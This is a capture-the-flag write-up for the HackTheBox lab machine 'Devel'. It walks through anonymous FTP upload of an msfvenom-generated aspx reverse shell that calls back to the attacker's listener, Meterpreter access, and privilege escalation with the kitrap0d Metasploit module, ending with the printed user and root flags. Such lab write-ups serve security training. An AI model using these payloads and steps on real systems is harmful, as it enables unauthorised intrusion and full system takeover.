HackTheBox Devel
Writeup for HackTheBox Devel
HackTheBox Devel
Machine Synopsis
Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nmap -sC -sV -A 10.10.10.5
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Here is the default webpage.
Seems like there is nothing special on the website? Let’s look at the nmap scan again.
Trying FTP port
From the nmap scan, we can see that there is a welcome.png which is in their ftp port which is then displayed on the website. Let’s try connecting to the ftp server and upload something.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ echo Testing FTP > test.txt
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:shiro): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
Exploitation
A quick Google search on IIS 7.5 shows that ISP runs on ASP.NET. This indicates that we might be able to create an aspx reverse shell with msfvenom to put into the ftp server for a reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT: 4444 -f aspx -o exploit.aspx
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:shiro): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put exploit.aspx
local: exploit.aspx remote: exploit.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
Create a listener in msfconsole.
1
2
3
4
5
6
7
8
9
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit
Now go to webpage 10.10.10.5/exploit.aspx to trigger the reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.5:49158)
meterpreter > shell
c:\windows\system32\inetsrv>systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 13/5/2021, 6:50:52 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.467 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.547 MB
Virtual Memory: In Use: 594 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::81e3:d327:33bf:2808
[04]: dead:beef::58c0:f1cf:abc6:bb9e
c:\windows\system32\inetsrv>cd C:\\Users
C:\Users>dir
18/03/2017 02:16 �� <DIR> .
18/03/2017 02:16 �� <DIR> ..
18/03/2017 02:16 �� <DIR> Administrator
17/03/2017 05:17 �� <DIR> babis
18/03/2017 02:06 �� <DIR> Classic .NET AppPool
14/07/2009 10:20 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 22.277.140.480 bytes free
C:\Users>cd babis
Access is denied.
C:\Users>cd Administrator
Access is denied.
Seems like we can’t do anything with this account. I guess we need to find a way to escalate our privilege.
Privilege Escalation
Let’s use Metasploit’s local_exploit_suggester to suggest us something!
1
2
3
4
5
6
7
8
9
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
...
[*] Post module execution completed
Doing a quick research on kitrap0d shows that the exploit can be used because the systeminfo showed that the machine is x86 version which is vulnerable to kitrap0d.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Launching notepad to host the exploit...
[+] Process 3284 launched.
[*] Reflectively injecting the exploit DLL into 3284...
[*] Injecting exploit into 3284 ...
[*] Exploit injected. Injecting payload into 3284...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.2:4444 -> 10.10.10.5:49159)
meterpreter > shell
...
c:\windows\system32\inetsrv>cd C:\\Users\babis\Desktop
C:\Users\babis\Desktop>type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
C:\Users\babis\Desktop>cd C:\\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
e621a0b5041708797c4fc4728bc72b4b
This post is licensed under CC BY 4.0 by the author.